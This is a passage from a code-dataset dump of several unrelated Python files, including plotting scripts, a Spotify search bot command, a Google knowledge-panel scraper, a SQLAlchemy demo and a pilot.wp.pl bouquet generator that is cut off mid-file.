matplotlib.pyplot as plt\n#Variables\nN=1000000\nNbin = 50\ntally_bin = []\n#construct frequency distribution\nfor i in range(0,N):\n\n\tx = -np.log(np.random.random())\n\tif(x<=5):\n\t\ttally_bin.append(x)\nhist, bins = np.histogram(tally_bin, bins=50) #creates the 
histogram, 50 bins\nwidth = 0.7 * (bins[1] - bins[0]) #define width of bars\ncenter = (bins[:-1] + bins[1:]) / 2 #define center of bar graph\n#define actual PDF\nx=np.linspace(0,5,N)\ny= hist.max() * np.exp(-x)\n#plot histogram\nhisto = plt.bar(center, hist, align='center', width=width)\n#plot actual PDF\nactual = plt.plot(x,y,'r',label='Actual PDF')\n#plotting parameters\nplt.legend(handles=actual)\nplt.text(3.5,80000, r'$N=1000000$',fontsize='20')\nplt.show()\n\n", "sub_path": "hw3/question1.py", "file_name": "question1.py", "file_ext": "py", "file_size_in_byte": 814, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.log", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.histogram", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "359201910", "text": "from Core.OS.Keys3 import spotifyID, spotifySecret\nfrom Spotify.Albums import embedSpotifyAlbum \nfrom Spotify.Artists import embedSpotifyArtist\nfrom Spotify.Playlists import embedSpotifyPlaylist\nfrom Spotify.Podcasts import embedSpotifyShow\nfrom Spotify.Tracks import embedSpotifyTrack\nimport asyncio\nimport base64\nimport requests\nfrom Core.Fonctions.Embeds import embedAssert, exeErrorExcept\nfrom Core.Fonctions.Phrase import createPhrase\nfrom Core.Fonctions.WebRequest import webRequestHD\n\nasync def exeSpotify(ctx,bot,args,option):\n    try:\n        assert len(args)>0, \"Donnez moi une recherche à faire !\"\n        dictOption={\"spoartiste\":\"artist\",\"spoalbum\":\"album\",\"spotitre\":\"track\",\"spopodcast\":\"show\",\"spoplaylist\":\"playlist\"}\n        args=createPhrase(args)\n        connect=await loginSpotify(dictOption[option], args)\n        if option==\"spoartiste\":\n            embedS=await embedSpotifyArtist(connect[0],connect[1])\n        elif option==\"spotitre\":\n            embedS=await embedSpotifyTrack(connect[0],connect[1])\n        elif option==\"spoalbum\":\n            embedS=await embedSpotifyAlbum(connect[0],connect[1])\n        elif option==\"spopodcast\":\n            embedS=await embedSpotifyShow(connect[0],connect[1])\n        elif option==\"spoplaylist\":\n            embedS=await embedSpotifyPlaylist(connect[0],connect[1])\n    except AssertionError as er:\n        embedS=embedAssert(str(er))\n    except asyncio.exceptions.TimeoutError:\n        # build the embed instead of sending here; the shared ctx.send below would otherwise hit an unbound embedS\n        embedS=embedAssert(\"Temps de requête écoulé, veuillez réessayer.\")\n    except:\n        embedS=await exeErrorExcept(ctx,bot,args)\n    await ctx.send(embed=embedS)\n    return\n\nasync def loginSpotify(option, args):\n    client_id = 
spotifyID\n client_secret = spotifySecret\n encodedData = base64.b64encode(bytes(f\"{client_id}:{client_secret}\", \"ISO-8859-1\")).decode(\"ascii\")\n access = {'Authorization': \"Basic \"+encodedData}\n data = {'grant_type': 'client_credentials'}\n response = requests.post('https://accounts.spotify.com/api/token', headers=access, data=data)\n code='Bearer '+response.json()[\"access_token\"]\n headers = {'Authorization': code, 'Content-Type': 'application/json', 'Accept': 'application/json'}\n params = (('q', args),('type', option),('market', 'FR'),('limit', '1'))\n table=await webRequestHD(\"https://api.spotify.com/v1/search\",headers,params)\n assert table[option+\"s\"][\"items\"]!=[],\"Je n'ai rien trouvé ! Vérifiez bien ce que vous cherchez.\"\n return table, code", "sub_path": "Spotify/exeSpotify.py", "file_name": "exeSpotify.py", "file_ext": "py", "file_size_in_byte": 2485, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "Core.Fonctions.Phrase.createPhrase", "line_number": 18, "usage_type": "call"}, {"api_name": "Spotify.Artists.embedSpotifyArtist", "line_number": 21, "usage_type": "call"}, {"api_name": "Spotify.Tracks.embedSpotifyTrack", "line_number": 23, "usage_type": "call"}, {"api_name": "Spotify.Albums.embedSpotifyAlbum", "line_number": 25, "usage_type": "call"}, {"api_name": "Spotify.Podcasts.embedSpotifyShow", "line_number": 27, "usage_type": "call"}, {"api_name": "Spotify.Playlists.embedSpotifyPlaylist", "line_number": 29, "usage_type": "call"}, {"api_name": "Core.Fonctions.Embeds.embedAssert", "line_number": 31, "usage_type": "call"}, {"api_name": "asyncio.exceptions", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Core.Fonctions.Embeds.embedAssert", "line_number": 33, "usage_type": "call"}, {"api_name": "Core.Fonctions.Embeds.exeErrorExcept", "line_number": 35, "usage_type": "call"}, {"api_name": "Core.OS.Keys3.spotifyID", "line_number": 40, "usage_type": "name"}, {"api_name": "Core.OS.Keys3.spotifySecret", "line_number": 41, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 45, "usage_type": "call"}, {"api_name": "Core.Fonctions.WebRequest.webRequestHD", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "201854966", "text": "#!/usr/bin/python\n\nfrom PIL import Image\n\ndesired = 200\ndirections = [\n {'x':1,'y':0},\n {'x':0,'y':1},\n {'x':-1,'y':0},\n {'x':0,'y':-1},\n]\n\nout = {}\nfor q in range(100):\n img = Image.open('frame.jpg')\n\n for direction in directions:\n current = 0\n x = 300\n y = 700\n\n while current < desired:\n r,g,b = img.getpixel((x,y))\n x = x + direction['x']\n y = y + direction['y']\n\n current = (256 * 3) - r - g - b;\n\n if x < 300:\n out['right'] = x\n if x > 300:\n out['left'] = x\n if y < 700:\n out['top'] = y\n if y > 700:\n out['bottom'] = y\n \n print(out)\n\n", "sub_path": "python3/src/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "PIL.Image.open", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "52262521", "text": "from subprocess import call\nfrom datetime import datetime\nimport os\nimport pandas as pd\nfrom sty import fg, rs\nimport time\nimport csv\nimport json\nimport re\nimport sys\nimport requests\nimport 
shutil\n\nstart_time = time.time()\nheaders_Get = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Accept-Encoding': 'gzip, deflate',\n 'DNT': '1',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1'\n}\n\nhtml_tags = {\n 'knowledge_panel': 'kp-blk knowledge-panel',\n 'claimed': \"Own this business?\",\n 'name': \"kno-ecr-pt PZPZlf gsmt\",\n 'summary': \"kc:/local:one line summary\",\n 'stars': \"kc:/collection/knowledge_panels/local_reviewable:star_score\",\n 'comments': \"t-h6pVaOIWfNg\",\n 'web_review': \"kc:/location/location:third_party_aggregator_ratings\",\n 'phone': 'LrzXr zdqRlf kno-fv',\n # 'days': \"kc:/location/location:hours\",\n 'address': \"kc:/location/location:address\",\n 'website': \"IzNS7c duf-h\",\n 'gmap': \"rhsl4 rhsmap3col\",\n 'visiting': \"kc:/local:plan your visit\"\n}\n\nhtml_regexes = {\n 'name': '(.*)',\n 'summary': '(.*?)',\n 'stars': 'aria-label=\"(.*?)\"',\n 'comments': '(.*)',\n # 'web_review': 'aria-label=\"(.*?)\"',\n # 'web_review': 'href=\"(.*?)\"',\n 'web_review': '(.*)',\n 'phone': '(.*?)',\n 'hours': '(.*)',\n 'address': '(.*)',\n 'website': 'href=\"(.*?)\"',\n 'gmap': 'data-url=\"(.*?)\"',\n 'visiting': '(.*)'\n}\n\n# days = [\"Sunday\", \"Monday\", \"Tuesday\",\n# \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\n\ncsv_data = 'results.csv'\ncsv_data_true = 'results_true.csv'\ncsv_data_false = 'results_false.csv'\ngood_res = 0\nbad_res = 0\n\nEDITOR = os.environ.get('EDITOR') if os.environ.get('EDITOR') else 'vim'\n\n\ndef current_time():\n return datetime.now().strftime('%Y-%m-%d-%H-%M')\n\n\ndef google(q):\n s = requests.Session()\n q = '+'.join(q.casefold().replace(\n '&', ' and ').replace(\"'\", ' ').replace('!', '').replace('é', 'e').split())\n url = 'https://www.google.com/search?q=' + q + '&ie=utf-8&oe=utf-8'\n r = s.get(url, headers=headers_Get)\n return r.text\n\n\ndef get_string_after_tag(string, tag, regex, distance):\n if(tag not in string):\n return None\n\n index = string.find(tag)\n substr = string[index: index+distance]\n if re.search(regex, substr):\n return re.search(regex, substr).group(1)\n else:\n return None\n\n\ndef get_details(query):\n html_results = google(query)\n results = {'query': query}\n has_knowledge_panel = html_tags['knowledge_panel'] in html_results\n # print(html_results)\n\n if(has_knowledge_panel):\n results['query'] = query.replace(\n '&', ' and ').replace(\"'\", ' ').replace('!', '')\n results['exists'] = True\n\n results['name'] = get_string_after_tag(\n html_results, html_tags['name'], html_regexes['name'], 500)\n\n results['claimed'] = html_tags['claimed'] not in html_results\n\n summary = get_string_after_tag(\n html_results, html_tags['summary'], html_regexes['summary'], 600)\n if(summary):\n results['summary'] = summary\n\n stars = get_string_after_tag(\n html_results, html_tags['stars'], html_regexes['stars'], 500)\n if(stars):\n results['stars'] = stars.split(\":\")[1].split(\" sur\")[0]\n\n comments = get_string_after_tag(\n html_results, html_tags['comments'], html_regexes['comments'], 500)\n if(comments):\n results['comments'] = comments.split(\"\\xa0avis\")[0]\n\n web_review = get_string_after_tag(\n html_results, html_tags['web_review'], html_regexes['web_review'], 2500)\n if(web_review):\n web_review_all = re.findall(\n '(?:href=[\\'\"])([:/.A-z?<_&\\s=>0-9;-]+)', web_review)\n web_review_1 = web_review_all[0]\n 
results['web_review_1'] = web_review_1\n if len(web_review_all) > 1:\n web_review_2 = web_review_all[1]\n results['web_review_2'] = web_review_2\n\n phone_number = get_string_after_tag(\n html_results, html_tags['phone'], html_regexes['phone'], 200)\n if(phone_number):\n results['phone_number'] = phone_number\n\n address = get_string_after_tag(\n html_results, html_tags['address'], html_regexes['address'], 1000)\n if(address):\n results['address'] = address\n\n website = get_string_after_tag(\n html_results, html_tags['website'], html_regexes['website'], 200)\n if(website):\n results['website'] = website.split(\"/?\")[0]\n\n gmap = get_string_after_tag(\n html_results, html_tags['gmap'], html_regexes['gmap'], 1000)\n if(gmap):\n # results['gmap'] = gmap\n gmap_lat = re.findall(\"\\/@(-?[\\d\\.]*)\", gmap)\n gmap_lng = re.findall(\"\\/@[-?\\d\\.]*\\,([-?\\d\\.]*)\", gmap)\n results['gmap_lat'] = gmap_lat[0]\n results['gmap_lng'] = gmap_lng[0]\n\n visiting = get_string_after_tag(\n html_results, html_tags['visiting'], html_regexes['visiting'], 500)\n if(visiting):\n results['visiting'] = visiting\n\n # if html_tags['days'] in html_results:\n # hours_index = html_results.find(html_tags['days'])\n # hours_substr = html_results[hours_index: hours_index+2000]\n # for day in days:\n # results['{}_hours'.format(day)] = get_string_after_tag(\n # hours_substr, day, html_regexes['hours'], 50)\n\n else:\n results['exists'] = False\n\n return results\n\n\nif __name__ == \"__main__\":\n with open(sys.argv[1], newline='') as csvfile:\n with open(csv_data, 'w', newline='') as results:\n reader = csv.reader(csvfile)\n fieldnames = [\n 'query',\n 'exists',\n 'name',\n 'summary',\n 'phone_number',\n 'address',\n 'website',\n 'web_review_1',\n 'web_review_2',\n 'claimed',\n 'stars',\n 'comments',\n 'visiting',\n 'gmap_lat',\n 'gmap_lng',\n # \"Friday_hours\", \"Saturday_hours\", \"Sunday_hours\", \"Monday_hours\", \"Tuesday_hours\", \"Wednesday_hours\", \"Thursday_hours\"\n ]\n writer = csv.DictWriter(results, fieldnames=fieldnames)\n writer.writeheader()\n\n for row in reader:\n fetch = get_details(u\" \".join(row))\n if(fetch['exists'] == True):\n writer.writerow(fetch)\n print(fg.green, reader.line_num,\n row[0], fetch['exists'], fg.rs)\n else:\n fetch = get_details(u\" \".join(row))\n writer.writerow(fetch)\n print(fg.li_cyan, \"AGAIN!\", reader.line_num,\n row[0], fetch['exists'], fg.rs)\n if(fetch['exists'] == False):\n print(fg.red, \"... 
NOPE!!!\", fg.rs)\n\n # CLEAN FILES!\n with open(csv_data, 'r') as inp, open(csv_data_false, 'w') as out:\n writer = csv.writer(out)\n\n for row in csv.reader(inp):\n if row[1] != \"True\":\n writer.writerow(row)\n\n with open(csv_data, 'r') as inp, open(csv_data_true, 'w') as out:\n writer = csv.writer(out)\n\n for row in csv.reader(inp):\n if row[1] != \"False\":\n writer.writerow(row)\n\n df = pd.read_csv(csv_data_false)\n # df = df.drop(df.loc[:, 'exists':'gmap_lng'].columns, axis=1)\n df = df.drop(df.iloc[:, 1:14].columns, axis=1)\n df.to_csv(csv_data_false, header=False, index=False)\n\n # GET THE COUNT!\n print('')\n print(\" 🌈 🦄 💨\")\n print('')\n with open(csv_data_true) as f:\n total = sum(1 for line in f)\n good_res = total-1\n print(fg.li_green, \"😎 total good data: \", total-1, fg.rs)\n\n with open(csv_data_false) as f:\n total = sum(1 for line in f)\n bad_res = total\n print(fg.li_red, \"😭 total bad data: \", total, fg.rs)\n print('')\n\n\n# COPY FILES INTO TIMESTAMPS FOLDER IF NEEDED\nif(good_res > 0):\n os.mkdir(os.path.join('./', str(current_time())))\n shutil.copy(csv_data, str(current_time()))\n shutil.copy(csv_data_false, str(current_time()))\n shutil.copy(csv_data_true, str(current_time()))\n\n\n# REPORT\nmybad = (bad_res * 100)/(good_res + bad_res)\nelapsed_time = time.time() - start_time\nprint(fg.li_yellow, \"🤖 BTW! Done in: \", time.strftime(\n \"%H:%M:%S\", time.gmtime(elapsed_time)), \" with \", \"{0:.2f}\".format(round(mybad, 2)), \"% \", \"errors\", fg.rs)\n\n\ntry:\n input_ = raw_input\nexcept NameError:\n input_ = input\n\n\ndef query_yes_no(question, default=False):\n yes_list = [\"yes\", \"y\"]\n no_list = [\"no\", \"n\"]\n\n default_dict = {\n None: \"[y/n]\",\n True: \"[Y/n]\",\n False: \"[y/N]\",\n }\n\n default_str = default_dict[default]\n prompt_str = \"%s %s \" % (question, default_str)\n\n while True:\n choice = input_(prompt_str).lower()\n\n if not choice and default is not None:\n return default\n if choice in yes_list:\n return True\n if choice in no_list:\n return False\n\n notification_str = \"Please respond with 'y' or 'n'\"\n print(notification_str)\n\n\nq1 = fg.li_yellow + \" 🤖 Do you want to open \" + \\\n csv_data_false + \" inside \" + EDITOR + \" ?\" + fg.rs\nqq = fg.li_yellow + \" 🤖 Bye...\" + fg.rs\n\nprint('')\nedit_false_data = query_yes_no(q1)\nif edit_false_data == True:\n call([EDITOR, csv_data_false])\n\nelif edit_false_data == False:\n print(qq)\n quit\n", "sub_path": "gkps.py", "file_name": "gkps.py", "file_ext": "py", "file_size_in_byte": 10122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "time.time", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 66, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 66, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "name"}, {"api_name": "requests.Session", "line_number": 74, "usage_type": "call"}, {"api_name": "re.search", "line_number": 88, "usage_type": "call"}, {"api_name": "re.search", "line_number": 89, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 128, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 155, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 156, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 179, "usage_type": "attribute"}, {"api_name": 
"csv.reader", "line_number": 181, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 200, "usage_type": "call"}, {"api_name": "sty.fg.green", "line_number": 207, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 207, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 208, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 208, "usage_type": "name"}, {"api_name": "sty.fg.li_cyan", "line_number": 212, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 212, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 213, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 213, "usage_type": "name"}, {"api_name": "sty.fg.red", "line_number": 215, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 215, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 215, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 219, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 221, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 226, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 228, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 232, "usage_type": "call"}, {"api_name": "sty.fg.li_green", "line_number": 244, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 244, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 244, "usage_type": "attribute"}, {"api_name": "sty.fg.li_red", "line_number": 249, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 249, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 249, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 256, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 257, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 258, "usage_type": "call"}, {"api_name": "time.time", "line_number": 263, "usage_type": "call"}, {"api_name": "sty.fg.li_yellow", "line_number": 264, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 264, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 264, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 265, "usage_type": "call"}, {"api_name": "sty.fg.rs", "line_number": 265, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 265, "usage_type": "name"}, {"api_name": "sty.fg.li_yellow", "line_number": 301, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 301, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 302, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 302, "usage_type": "name"}, {"api_name": "sty.fg.li_yellow", "line_number": 303, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 303, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 303, "usage_type": "attribute"}, {"api_name": "subprocess.call", "line_number": 308, "usage_type": "call"}]} +{"seq_id": "271286865", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport time\nimport seaborn as sns\n\ndef plot_freeway_heatmap(metrics, _title, myfigy, threshold_alldays):\n index_fields = ['timeOfDay', 'Abs_PM']\n metric_names = set([a[0] for a in metrics.columns if a[0] not 
in index_fields])\n \n vmaxmin= {}\n for a in threshold_alldays.iteritems():\n name = \"\".join(a[0]).replace(\" \", \"\")\n vmaxmin[name] = [\n threshold_alldays[a[0]][0], \n threshold_alldays[a[0]][1]\n ]\n \n #vmaxmin[name] = [min(threshold_alldays[a[0]][0] + #3*threshold_alldays[a[0]][1], 900),\n # min(x for x in [threshold_alldays[a[0]][0] - 2*threshold_alldays[a[0]][1], \n # threshold_alldays[a[0]][0] - threshold_alldays[a[0]][1], \n # threshold_alldays[a[0]][0]*.25] \n # if x >= 0)\n # ]\n \n number_stations = len(metrics['Abs_PM'].unique())\n \n # Set up the matplotlib figure\n f, axes = plt.subplots(3, 3, figsize=(15, myfigy), sharey=True)\n f.suptitle(_title)\n sns.despine(left=True)\n sns.set(context=\"paper\", font=\"monospace\")\n \n cmap = sns.diverging_palette(h_neg=0, h_pos=260, s=99, l=10,as_cmap=True, center='light')\n \n i=0\n j=0\n for a in sorted(metric_names):\n base_metric = a.split(\"+\")[0]\n base_metric = base_metric.split(\"-\")[0][:-5]\n sns.heatmap(metrics.pivot(\"Abs_PM\", \"timeOfDay\", a), \n vmin=vmaxmin[base_metric][1], \n vmax=vmaxmin[base_metric][0],\n xticklabels=12, \n cmap=cmap,\n ax=axes[i, j],\n cbar=True,\n cbar_kws = {'orientation': 'horizontal'})\n axes[i, j].set_title(a)\n \n i += 1\n if i > 2:\n i = 0\n j += 1\n \n f.savefig('../images/'+_title+'.pdf', bbox_inches='tight')\n return threshold_alldays", "sub_path": "cohort2/trafficpassion/plot_fwy_stats.py", "file_name": "plot_fwy_stats.py", "file_ext": "py", "file_size_in_byte": 2129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 32, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 33, "usage_type": "call"}, {"api_name": "seaborn.diverging_palette", "line_number": 35, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "59347276", "text": "# sqlalchemy connected to postgres database\r\n# Working good\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import Column, Integer, Boolean, String, Numeric, Date, MetaData, Table, DateTime\r\nimport datetime\r\n\r\nengine = create_engine(\"postgres+psycopg2://openpg:openpgpwd@localhost/postgres\")\r\nconn = engine.connect()\r\nsession = sessionmaker(bind=engine)\r\nsesh = session()\r\nBase = declarative_base()\r\nprint(sesh)\r\nprint(engine)\r\nprint(conn)\r\n\r\n\r\n# for creating table using class book\r\nclass Candidate(Base):\r\n __tablename__ = 'candidateInformation'\r\n id = Column(Integer, primary_key=True)\r\n Name = Column(String)\r\n phoneNo = Column(Numeric)\r\n Gmail = Column(String)\r\n Address= Column(String)\r\nclass CandidateDetails(Base):\r\n __tablename__ = 'candidateDetails'\r\n id = Column(Integer, primary_key=True)\r\n MotherName = Column(String)\r\n FatherName = Column(String)\r\n yearofpassing = Column(Numeric)\r\n CGPA= Column(Numeric)\r\n\r\n\r\n\r\nBase.metadata.create_all(engine) # this is must for creating table\r\n\r\n# insert data one data/hardcoded\r\n'''\r\ncandidate = Candidate(\r\n Name='rahul',\r\n phoneNo='8835739884',\r\n Gmail='rahul121@gmail.com',\r\n Address='Bank colony,near veterinary hospital,Tirupati'\r\n)\r\n\r\nsesh.add(candidate)\r\ncandidatedetails = 
CandidateDetails(\r\n MotherName='rani',\r\n FatherName='ankat',\r\n yearofpassing='2019',\r\n CGPA='8.8'\r\n)\r\n\r\nsesh.add(candidatedetails)\r\n\r\nsesh.commit() # necessary\r\n'''\r\n\r\n\r\n# ---------------------------------------------------------------\r\n# read data (UNLOADING)\r\nfile = open(\"sphinxtext.txt\", \"w+\")\r\nresult = sesh.query(Candidate).all()\r\nresults= sesh.query(CandidateDetails).all()\r\nprint(result)\r\nprint(results)\r\n \r\nfor re in result:\r\n file.write(\"Name={}\".format(re.Name)+ '\\n')\r\n file.write(\"phoneNo={}\".format(re.phoneNo)+ '\\n')\r\n file.write(\"Gmail={}\".format(re.Gmail)+ '\\n')\r\n file.write(\"Address={}\".format(re.Address) + '\\n')\r\n\r\n\r\n\r\nfor re in results:\r\n file.write(\"MotherName={}\".format(re.MotherName)+ '\\n')\r\n file.write(\"FatherName={}\".format(re.FatherName)+ '\\n')\r\n file.write(\"Yearofpassing={}\".format(re.yearofpassing)+ '\\n')\r\n file.write(\"CGPA={}\".format(re.CGPA) + '\\n')\r\n\r\n", "sub_path": "sphinx-textfile/sphinxunload1.py", "file_name": "sphinxunload1.py", "file_ext": "py", "file_size_in_byte": 2314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Numeric", "line_number": 24, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 26, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 29, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 30, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 31, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Numeric", "line_number": 32, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Numeric", "line_number": 33, "usage_type": "argument"}]} +{"seq_id": "402411745", "text": "# -*- coding: utf-8 -*-\n#\n# Based on Kodi plugin.video.pilot.wp by c0d34fun licensed under GNU GENERAL PUBLIC LICENSE. 
Version 2, June 1991\n# Coded by j00zek\n#\n# ADDED by j00zek\n\nimport sys\nimport os\n\nfrom wpConfig import headers\nfrom wpConfig import params #'login_url', 'main_url', 'video_url', 'close_stream_url'\nfrom wpConfig import data\nfrom wpConfig import getCookie, saveCookie\n\ndef _generate_E2bouquet():\n def doLog(txt, append = 'a' ):\n print(txt)\n open(\"/tmp/wpBouquet.log\", append).write(txt + '\\n')\n \n doLog('', 'w')\n if file_name == '':\n doLog('Ustaw nazwę pliku docelowego!')\n return\n\n #login\n StoredCookie = getCookie()\n if not StoredCookie:\n StoredCookie = _login()\n if not StoredCookie:\n doLog('Nieudane logowanie. Sprawdź login i hasło w ustawieniach wtyczki.')\n return\n\n #get channels list\n import requests\n headers.update({'Cookie': StoredCookie})\n response = requests.get(\n params['main_url'],\n verify=False,\n headers=headers,\n ).json()\n \n channelsList = response.get('data', [])\n\n #generate bouquet\n from channelsMappings import name2serviceDict, name2service4wpDict, name2nameDict\n from datetime import date\n\n doLog('Generuje bukiet dla %s ...' % frameWork)\n open(\"/tmp/wpBouquet.log\", \"a\").write('Generuje bukiet dla %s ...\\n' % frameWork)\n data = '#NAME PILOT.WP.PL aktualizacja %s\\n' % date.today().strftime(\"%d-%m-%Y\")\n for item in channelsList:\n #print item\n if item.get('access_status', '') != 'unsubscribed':\n id = item.get('id', None)\n title = item.get('name', '').strip()\n lcaseTitle = title.lower().replace(' ','')\n standardReference = '%s:0:1:0:0:0:0:0:0:0' % frameWork\n #mapowanie bezpośrednie zdefiniowane dla wp\n ServiceID = name2service4wpDict.get(title , standardReference)\n if ServiceID.startswith(standardReference):\n ServiceID = name2serviceDict.get(name2nameDict.get(lcaseTitle, lcaseTitle) , standardReference)\n #mapowanie po znalezionych kanalach w bukietach\n if ServiceID.startswith(standardReference):\n doLog(\"\\t- Brak mapowania referencji kanału %s (%s) dla EPG\" % (title, lcaseTitle))\n if not ServiceID.startswith(frameWork):\n ServiceIDlist = ServiceID.split(':')\n ServiceIDlist[0] = frameWork\n ServiceID = ':'.join(ServiceIDlist)\n data += '#SERVICE %s:%s%s%s:%s\\n' % (ServiceID, streamlinkURL, params['video_url'].replace(':','%3a') , id, title)\n data += '#DESCRIPTION %s\\n' % (title)\n\n with open(file_name, 'w') as f:\n f.write(data.encode('utf-8'))\n f.close()\n\n doLog('Wygenerowano bukiet do pliku %s' % file_name)\n f = open('/etc/enigma2/bouquets.tv','r').read()\n if not os.path.basename(file_name) in f:\n doLog('Dodano 